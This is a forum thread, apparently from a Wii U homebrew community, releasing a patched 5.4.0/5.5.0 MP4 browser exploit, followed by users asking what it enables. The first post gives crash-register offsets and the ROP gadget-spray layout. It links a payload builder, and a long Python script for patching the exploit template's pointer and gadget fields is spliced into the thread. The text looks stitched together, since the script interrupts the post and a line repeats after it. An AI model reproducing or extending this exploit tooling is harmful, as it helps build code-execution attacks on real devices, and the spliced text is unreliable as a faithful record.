Hacking 5.4.0/5.5.0 MP4 Exploit

Thread starter: Mathew_Wi
Views: 49,125 | Replies: 104 | Likes: 34

Mathew_Wi
Since it was patched, there's no point in keeping this anymore. R.I.P. StageFright.

- Info -
With this you can build (and in theory, run) homebrew for Wii U version 5.4.0 and 5.5.0. It is incredibly bad, and likely won't run any code for you whatsoever. Sounds good right? Yeah? Right on!

- For Developers -
We have been incredibly lazy about fixing this. However, I have a hint for you. Use the code spray code from previous HTML exploits, and embed the MP4 exploit to run code that way.

In template540 and template550, offsets 0x79 to 0x7C contain the value that is in r30 when it crashes, which is an address to a point in the ROP buffer. Essentially, leave the rest of the MP4 file unchanged if you plan on doing it via HTML/JS. If you want to use another ROP gadget, then the address that is spammed at the end of the file is the gadget that we initially jump to.

- Download -
http://puu.sh/mt6LQ/45a4ab7ae8.zip (Only builds 5.5.0 payloads, edit generate_mp4.py to generate 5.4.0 payloads.)

- Credits -
zhuowei - Pointing out the bug to Marionumber1 and me.
Marionumber1 - All the fantastic ROP chain work. Plus all around masterful work. Wouldn't have been possible without him.
Mathew_Wi - Shitty initial exploitation/debugging/5.5.0 ROP Gadgets
MrRean - Helping in a way I can't quite remember.
NWPlayer123 - Something!
Hykem - I think he did something too, I can't remember, sue me.
Original Crew - comex, Relys, TheKit, and of course Mr. Chadderz himself.

- Special Thanks -
NWPlayer123 for convincing Marionumber1 to allow me to participate in the group. <3

If I forgot you, feel free to verbally abuse me on IRC or Skype.
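To make the two template fields described in the post concrete, here is an added Python example. It is not generate_mp4.py from the download and not the author's code; it relies only on what the post states: the 32-bit value at file offsets 0x79..0x7C is what r30 holds at the crash (a pointer into the ROP buffer), and the 32-bit address repeated at the end of the file is the first gadget jumped to. The demo template bytes, every address, the big-endian encoding (Wii U PowerPC byte order) and the assumption that the repeated tail words are aligned to the end of the file are all choices made for this example.

```python
"""Patch the two fields of the MP4 template that the post identifies.

Added example: this is not generate_mp4.py from the download and not the
author's code. It relies only on what the post states, namely that the 32-bit
value at file offsets 0x79..0x7C is what r30 holds at the crash (a pointer into
the ROP buffer) and that the 32-bit address repeated at the end of the file is
the first ROP gadget. The demo template bytes, every address, the big-endian
encoding (Wii U PowerPC) and the assumption that the repeated words are aligned
to the end of the file are all choices made for this example.
"""
from __future__ import annotations

import struct

R30_PTR_OFFSET = 0x79       # bytes 0x79..0x7C inclusive, per the post
WORD = struct.Struct(">I")  # big-endian u32 (assumption: PowerPC byte order)


def _check_u32(value: int, what: str) -> None:
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"{what} must fit in 32 bits, got {value:#x}")


def read_r30_pointer(mp4: bytes) -> int:
    """Return the value the post says ends up in r30 (offsets 0x79..0x7C)."""
    if len(mp4) < R30_PTR_OFFSET + 4:
        raise ValueError("template too short to contain the r30 pointer")
    return WORD.unpack_from(mp4, R30_PTR_OFFSET)[0]


def patch_r30_pointer(mp4: bytes, rop_buffer_addr: int) -> bytes:
    """Copy of the template with 0x79..0x7C pointing at rop_buffer_addr.

    Nothing else is touched: the post says to leave the rest of the file as is
    when the payload is delivered from HTML/JS.
    """
    _check_u32(rop_buffer_addr, "ROP buffer address")
    if len(mp4) < R30_PTR_OFFSET + 4:
        raise ValueError("template too short to contain the r30 pointer")
    buf = bytearray(mp4)
    WORD.pack_into(buf, R30_PTR_OFFSET, rop_buffer_addr)
    return bytes(buf)


def find_tail_spray(mp4: bytes) -> tuple[int, int]:
    """Locate the gadget address repeated at the end of the file.

    Walks back from EOF in 4-byte steps (assumption: the spray words are
    aligned to the end of file) while each word equals the final one, and
    never reaches into the r30 pointer bytes. Returns (start_offset, gadget);
    raises if the last word is not repeated at all.
    """
    if len(mp4) < R30_PTR_OFFSET + 4 + 8:
        raise ValueError("file too short to hold the pointer and a spray")
    gadget = WORD.unpack_from(mp4, len(mp4) - 4)[0]
    start = len(mp4) - 4
    while start - 4 >= R30_PTR_OFFSET + 4 and WORD.unpack_from(mp4, start - 4)[0] == gadget:
        start -= 4
    if start == len(mp4) - 4:
        raise ValueError("final word is not repeated: no gadget spray at end of file")
    return start, gadget


def replace_tail_gadget(mp4: bytes, new_gadget: int) -> bytes:
    """Swap the initial gadget (every word of the tail spray) for new_gadget."""
    _check_u32(new_gadget, "gadget address")
    start, _old = find_tail_spray(mp4)
    count = (len(mp4) - start) // 4
    return mp4[:start] + WORD.pack(new_gadget) * count


def build_demo_template(rop_ptr: int, gadget: int, spray_words: int = 64) -> bytes:
    """Constructed stand-in for template550 with the two fields in place.

    Not a valid MP4; the bytes outside the two fields are filler so the example
    runs offline. The filler word 0x41414141 must differ from the gadget or the
    spray scan would swallow it.
    """
    _check_u32(rop_ptr, "ROP buffer address")
    _check_u32(gadget, "gadget address")
    head = bytearray(R30_PTR_OFFSET + 4)       # offsets 0x00..0x7C, zeroed
    head[4:8] = b"ftyp"                        # cosmetic box tag only
    WORD.pack_into(head, R30_PTR_OFFSET, rop_ptr)
    middle = b"\x41" * 0x20                    # the part the post says to leave alone
    return bytes(head) + middle + WORD.pack(gadget) * spray_words


if __name__ == "__main__":
    # Placeholder addresses, not real 5.4.0/5.5.0 values.
    tmpl = build_demo_template(rop_ptr=0x1A2B3C40, gadget=0x010F0000)
    print(f"r30 at crash: {read_r30_pointer(tmpl):#010x}")
    start, gadget = find_tail_spray(tmpl)
    print(f"spray of {(len(tmpl) - start) // 4} words of {gadget:#010x} from {start:#x}")
    patched = replace_tail_gadget(patch_r30_pointer(tmpl, 0x1B000000), 0x0102ABCD)
    print(f"new r30 {read_r30_pointer(patched):#010x}, new gadget {find_tail_spray(patched)[1]:#010x}")
```

With a real template550 you would pass the file's bytes instead of the constructed one; the two patch functions leave every byte outside the pointer field and the tail spray untouched, which is what the post recommends for the HTML/JS delivery route.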
If I forgot you, feel free to verbally abuse me on IRC or Skype.
lol.jk nice touch
So will 5.5.0 users be able to install the Homebrew Channel without using any game for the exploit to run?
 
So will 5.5.0 users be able to install the Homebrew Channel without using any game for the exploit to run?
5.5.0 users can't do much with this alone. 5.4.0 users will be able to do the same as 5.3.2 users basically, but 5.5.0 users won't be able to until an IOSU or kernel exploit is released
 
Could loadiine 5 come of this? Sorry if it's a stupid question and feel free to bash away! I'm a big boy and can handle it ;)
 
5.5.0 users can't do much with this alone. 5.4.0 users will be able to do the same as 5.3.2 users basically, but 5.5.0 users won't be able to until an IOSU or kernel exploit is released
Aww, I was hoping to get a Homebrew Channel since I can't get the games needed for triggering the exploit, but great reveal for 5.4 users, enjoy.
 
So you guys all abandoned this project and none of you is planning to fix it?
 